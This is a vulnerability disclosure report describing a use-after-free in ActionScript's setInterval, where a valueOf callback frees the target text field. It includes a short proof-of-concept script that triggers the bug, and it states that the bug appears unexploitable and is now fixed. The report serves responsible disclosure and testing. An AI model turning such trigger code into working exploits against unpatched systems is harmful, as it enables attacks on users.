There is a use-after-free in setInterval. If the interval length is an object with valueOf defined, this method gets executed, and can delete the object the interval is being set on. A minimal PoC is as follows:
_global.thiz = this;
var t = _global.thiz;
var tf = t.createTextField("tf", 1, 1, 2, 3, 4);
tf.natalie = intfunc;
setInterval(tf, "natalie", {valueOf: func});
function intfunc(){
trace("tick");
trace(this);
this.text = this;
}
function func(){
tf.removeTextField();
trace("after free");
var tf2 = _global.thiz.createTextField("tf2", 5, 1, 2, 300, 400);
tf2.natalie = intfunc;
return 100;
}
This PoC demonstrates the use-after-free because the interval is set on the newly allocated object, even though it was called on the object that was freed. The test fails (demonstrates the vulnerability) if the text "_level0.tf2" appears on the screen. It passes otherwise. I have not been able to make this issue cause a crash, as there does not appear to be anything interesting ever allocated in the same heap slot as the freed object, so I think this issue is probably not exploitable. Reporting it because I am not confident of this, especially on 32-bit platforms.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Status: Fixed